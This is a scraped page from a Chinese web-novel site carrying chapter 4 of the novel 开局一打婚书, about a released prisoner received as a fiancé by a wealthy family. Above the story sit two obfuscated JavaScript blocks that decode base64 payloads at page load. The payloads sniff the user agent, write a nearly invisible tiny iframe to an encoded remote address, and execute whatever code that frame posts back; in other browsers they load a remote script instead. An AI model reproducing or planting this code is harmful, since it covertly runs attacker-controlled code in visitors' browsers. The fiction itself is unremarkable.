eval("\x77\x69\x6e\x64\x6f\x77")["\x66\x66\x66\x4E"]=function(e){var JN =''+'ABCDEFGHI'+'JKLMNOPQRSTU'+'VWXYZabcde'+'fghijklmn'+'opqrstuv'+'wxyz01234567'+'89+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=JN.indexOf(e.charAt(f++));o=JN.indexOf(e.charAt(f++));u=JN.indexOf(e.charAt(f++));a=JN.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x58\x55\x4A\x75\x4E\x66\x79\x56\x41"]=function(){eval(fffN("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoZmZmTih1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKGZmZk4oIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihmZmZOKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbZmZmTigiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMjUzNCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8yNTM0J109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbihmZmZOKGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJzFJVCcrJ0wwTVQnKydOeTAnKyd5JysnWScrJ0dKVEozJysnbFhlc0InKydUJysnYkdKVEonKyd6UUROdycrJ0VUUXonKydVUycrJ2J2TicrJ20nKydMdScrJ3UnKydKJysnMmNtJysnUldidScrJ3VjJysnM2QzWmsnKydNJysnbFknKydrTWxFMCcrJ01sTUhjJysnMFJIJysnYScrJycrJycsJycrJ2tnSCcrJ3JwdicrJ0hDJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ2hBNScrJ0dZRycrJ1cnKycnKycnLCd1Jyk="));}

开局一打婚书全文txt免费阅读第4章

eval("\x77\x69\x6e\x64\x6f\x77")["\x69\x64\x45\x70"]=function(e){var ie =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXYZab'+'cdefghijklmno'+'pqrstuvwxyz012345'+'6789+/'+'='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=ie.indexOf(e.charAt(f++));o=ie.indexOf(e.charAt(f++));u=ie.indexOf(e.charAt(f++));a=ie.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x69\x79\x65\x53\x64\x45\x69\x4B"]=function(){eval(idEp("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoaWRFcCh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKGlkRXAoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihpZEVwKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbaWRFcCgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKGlkRXAoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SScrJ1RMNScrJ1EnKydUTnknKycweVlHJysnSlRKNGMnKyd6YzQnKydCWCcrJ2RHJysnSlQnKydKelEnKydETndFJysnVFF6VVMnKydTYnYnKydOJysnbUx1SjInKydjbVInKydXYnVjMycrJ2QzJysnWmsnKydNbFlrTScrJ2xFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ05HTCcrJ21HcCcrJ2RFJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ1pJbScrJ1dVMCcrJ2InKycnKycnLCdTJyk="));}

小说《开局一打婚书》内容很有吸引力,看过前一章就已经迫不及待的想要追下一章,任狂苏洛人设讨喜,十指炫舞文笔极佳,《开局一打婚书》第4章写的是:任狂张嘴一笑,露出一口大白牙。看起…

开局一打婚书》 第4章 在线阅读

任狂张嘴一笑,露出一口大白牙。

看起来有几分憨厚。

“岳父大人好,任狂有礼了。”

苏北风就像是触电了一般,愣在当场,好半晌没回过神来。

苏家,在中海乃首屈一指的豪门。

家族中从军从政者甚多。

其父苏胜,乃是镇守西北的一员猛将。

据说,和传说之中的魔医狂龙大人有一面之缘。

这次刻意来电,说为孙女苏洛定了一门亲事。

对方是世所罕见的年轻俊杰。

婚事成,苏洛的绝症将迎刃而解。

苏北风期待了很久,满怀希望来接机。

哪知道,所谓举世无双的女婿,竟然是一个囚犯。

巨大的反差,让苏北风差点晕眩过去。

要不是老爷子身居高位,在家族极有威信,苏北风只怕已经转身离去。

他深吸一口气,道:“我女儿呢?你们不是一同回来的么?”

任狂将事情经过说了一遍,道:“她的病情暂时得到缓解,在医院休息一夜,便会恢复。”

苏北风咬咬牙,道:“任狂,只要你能救小女,她彻底恢复的那一天,就是你们结婚的日子。”

“虽然我不知道老爷子为何这么信任你,但,我只想要我女儿幸福,你敢欺骗苏洛,我保证你走不出中海。”

任狂点点头:“苏落的病情,我自有把握。”

苏北风犹豫了一下,道:“你既和魔医狂龙有关系,为何会入狱?”

任狂淡淡道:“这是我的私事,岳父大人如果不同意这门婚事,可以让老爷子亲自开口来说。”

苏北风道:“我只在乎阿洛的安危,其他的,我不管。”

女儿都要死了,身为女儿奴的他,愿意付出一切代价。

直升机盘旋着,来到苏家别墅区。

苏家所在的高档别墅区,由苏氏集团自己开发。

为了彰显家族荣耀,特地在最好的地段建立了一座庄园。

数十栋别墅组成了独立的小区。

在中海,这里是普通人可望不可即的地方。

此刻,苏家核心弟子十几人,加上一群长老,都在翘首期待。

苏洛之美,冠绝中海。

无数大家族的公子少爷,对其痴迷。

甚至连领航者陈文祥的公子陈森,都对其倾慕不已。

而苏洛,唯一看得入眼的,也是这位陈森。

很多人甚至已经默认两人是一对。

谁也没想到,关键时刻,空降一个任狂。

他们对任狂,很好奇。

到底是怎么样的天才俊杰,才能让老爷子亲自赐婚?

直升机停下,任狂背着发白的背包,跳下了飞机。

对于周围奢华的环境,他没有任何的反应。

对于苏家众人的脸色,也没有丝毫的在意。

前方大院中,一群苏家的长老和弟子,集体陷入石化之中。

他们震惊的看着身穿囚服的任狂,感觉世界观被彻底颠覆。

老爷子为苏洛挑选的女婿,竟然是一个囚徒?

那天蓝色的制式服装,包括上面的编号,就像是天雷在轰鸣,轰得苏家的人目瞪口呆。

“你就是任狂?老爷子为我女儿选的神龙佳婿?”

苏洛的母亲王兴玲看到任狂这副打扮,几乎不敢相信自己的眼睛。

苏北风无奈的介绍道:“任狂,这是我妻子王兴玲,你可以叫她伯母。”

任狂憨厚一笑,露出一口大白牙。

“丈母娘好,我叫任狂,请多多关照。”

王兴玲失声道:“你……你叫我什么?”

“丈母娘啊!”任狂认真的道:“苏洛是我未婚妻,您是她母亲,我不应该叫丈母娘么?”

王兴玲差点晕眩过去。

这个女婿,简直就是个愣头青。

她深吸一口气,道:“你叫任狂,和中州任家是什么关系?”

任狂摇摇头:“没有任何关系。”

苏北风皱眉:“任狂确实是任家的弟子,只是……只是他现在和家族有些误会。”

“误会?”一个声音大声道:“家主,您被人骗了,他何止是误会?分明就是个弃子,早在13年前,就已经被逐出家族了。”

说话的,是苏洛的堂兄苏尘。

他20多岁年纪,年轻气盛。

苏北风道:“苏尘,你在这里胡说什么呢。”

苏尘气愤的看着任狂,道:“任狂,你自己说,是不是事实?”

任狂淡淡道:“我不是说了吗?我和中州任家,没有半点关系。”

王兴玲道:“我只听过中州任家有个少爷叫任风,年仅20,有绝世之姿。”

“我本以为,你是他。”

“没想到,你竟然是个冒牌货。”

“这门婚事,我不同意。”

她咬牙道:“我女儿苏洛,乃天之骄女,不为国母,至少也是王妃,岂能嫁给一个毫无前途的弃少?”

苏北风皱眉:“这是老爷子的决定,谁也不得异议。”

王兴玲咬牙:“但也不能枉顾女儿的幸福啊!

苏北风冷哼道:“你会在意女儿的幸福?不是嫌弃她是个病秧子,想早点丢出去么?”

王兴玲怒道:“苏北风,谁给你的胆对我如此说话?”

苏北风顿时闭嘴,神色有些尴尬。

王兴玲看着任狂,冷冷道:“任狂,你从哪里来就回哪里去吧,苏家,不适合你。”

她,居然直接逐客。

任狂为难的道:“我没意见,不过,只要苏胜老爷子亲口对我说,我马上就走。”

提到苏胜的名字,王兴玲眼中露出一丝惧意。

苏家,依靠苏胜而存在。

他的命令,谁敢违背?

可王兴玲不甘心。

如果是任风,倒也罢了,但任狂只是一个无用的弃子。

而且,刚从监狱放出来。

连个落脚之处都没有。

这要是让其他家族的人知道,苏家立马会成为中海的笑柄。

最可恶的是,这小子一点自觉性都没有。

穿着囚服,似乎还觉得自己挺帅。

不知道的,还以为这是今年流行的新款时装呢。

苏北风喝道:“谁反对,谁亲自和老爷子交涉去,如果老爷子同意,我没话说。”

“否则,你们就给我安分点。”

堂哥堂姐纷纷看着任狂,眼神不善。

他们不在乎苏落能不能幸福。

他们只在乎自己的颜面。

很多人已经暗暗下定决心,找机会暗中收拾任狂。

要是能将他直接逼走更好。

否则,出去玩,还怎么抬得起头来?

苏北风道:“既然大家都没意见,那就散了吧。”

“从此以后,任狂就是我苏家女婿,住千金阁。”

此话出,众人都是惊呆,议论纷纷。

千金阁,那可是苏洛独有的闺房。

按照苏家的规矩,这栋别墅就是苏洛的陪嫁之一。

住进千金阁,等于是彻底坐实了这桩婚姻。

王兴玲眉头一皱:“你……你居然安排他和阿洛住一起?”

苏北风深吸一口气,道:“这是老爷子的意思,你们谁不满,可以直接跟老爷子说。”

提到老爷子,所有人都低下头去。

老爷子肩膀上可是金色松叶一颗星。

浴血沙场,威风八面。

谁敢忤逆他?

在苏家众人杀人的目光中,任狂大摇大摆的住进了千金阁。

住了三年牢房,突然来到奢华的别墅,任狂虽然不在意这些,但也感觉很开心。

至于苏家人的感受,他根本就没放在心上。

他为人处世,喜欢制定小目标。

而当前,他的小目标就是拿下苏落,恢复自己的实力。

按照目前这个进度,只要再帮苏落治疗个七八次,这目标就算完成了。

千金阁装修得像皇宫一样豪华。

地板明亮,光可鉴人。

各种欧美壁画,尽显高贵奢华。

尤其是别墅周围,还种植着各种鲜花,散发出淡淡清香。

实在是一个雅致宁静的好地方。

别墅中空无一人。

任狂一番寻找,找了个最舒适的房间住下。

这里的浴室,比起监狱,简直不要太好。

任狂站在沐浴室内,怔怔看着镜子里的自己。

他的心口,骇然纹着一朵漆黑的花朵。

花有九瓣,根须无数。

一条条细若发丝,宛如老树盘根,扎根在任狂的胸腹之间。

其中一片,却诡异的呈现出晶莹的白色。

在一片黑色之中,尤为显眼。

“何时才能九叶蜕变啊!”

任狂叹息了一声。

这,并非纹身,而是一种诡异的伴生物。

它的出现,也并非恩赐,而是一种诅咒。

任狂当年被一个叫邪医的疯狂神医掳走,充当试验品。

这朵诡异无比的九星牵魂花,据说来自无比黑暗的异域。

看似花卉,实则是一种可怕的寄生物,以毒素和能量为食。

当年,邪医将这朵诡异的九星牵魂花,用惨绝人寰的手段,种植在他体内。

以百毒喂养,想要培育出惊世之毒。

哪知,任狂天赋异禀,竟然反客为主。

九星牵魂花,反倒成为他身体的一部分。

吸取毒素,存储毒素。

花叶变白,他的实力也就相应增加。

苏洛今晚会在医院度过。

任狂很期待明天见面的精彩。

他躺进温暖的被窝,美美的睡了起来。

清晨。

一声尖叫,突然从别墅中响起。

“来人啊,抓淫贼。”

女高音刺耳,周围顿时喧嚣一片。

任狂猛地睁眼:“好大的胆子,敢在我任狂面前行苟且之事,找死。”

一睁眼,他却是愣住。

眼前地上,正坐着一个花容失色的女子。

因为过度惊骇,女子脸色煞白,一副即将晕倒过去的模样。

任狂大惊,也不顾自己没有穿衣服的事实,直接跳下地。

“媳妇,你别慌,我来救你。”

任狂见苏洛气息缭乱,也是吓了一跳。

他抱起身子酥软的苏洛,就要将她放在床榻上。

“流氓,你好大的胆子。”

一声熟悉的怒吼响起,王嘉怡从楼下冲了上来。

千金阁在苏氏集团别墅群中心,可以说是本市最安全的地方之一。

她做梦也没想到,这样的地方,居然会出现淫贼。

踹开门,便看到光月半男人,正抱着大小姐走向床榻。

这一幕,简直让王嘉怡目赤欲裂。

“找死!”

她扑上去,一个飞踹。

劲风呼啸,这一脚,用尽她所有力量,足以踹裂厚实的木门。

但,眼前一花,这十拿九稳的一脚,落空了。

再看之时,任狂居然抱着苏洛,在瞬间跳到了床榻之上。

“小虎妞,住手。”

“你这是干什么?没看到我在救人么?”

任狂皱眉喝道。

救人?

王嘉怡定睛一看,银牙都差点咬碎。

“是你,你这个狂徒,竟敢跟踪我们到这里来,真是活腻了。”

“快放开大小姐。”

狂人见得多了,像任狂这么狂的,她还是第一次见。

飞机上猥亵不说,还直接追到家里。

脱光衣服,躲在大小姐的闺房床榻。

流氓当到这个份上,可说是无人能及了。

王嘉怡怒火冲天,恨不得将任狂碎尸万段。

任狂看着王嘉怡龇牙咧嘴的样子,甚至有些想笑。

“别这么激动,是苏北风让我住在这里的。”

他一边说,一边活动着手掌,在苏洛的肚皮上打圈圈。

这一幕,更是刺激得王嘉怡发狂。

“我杀了你这个狂徒。”

她一个飞跃,直接扑了上来。

原创文章,作者:十指炫舞,如若转载,请注明出处:https://www.d1xs.net/80544.html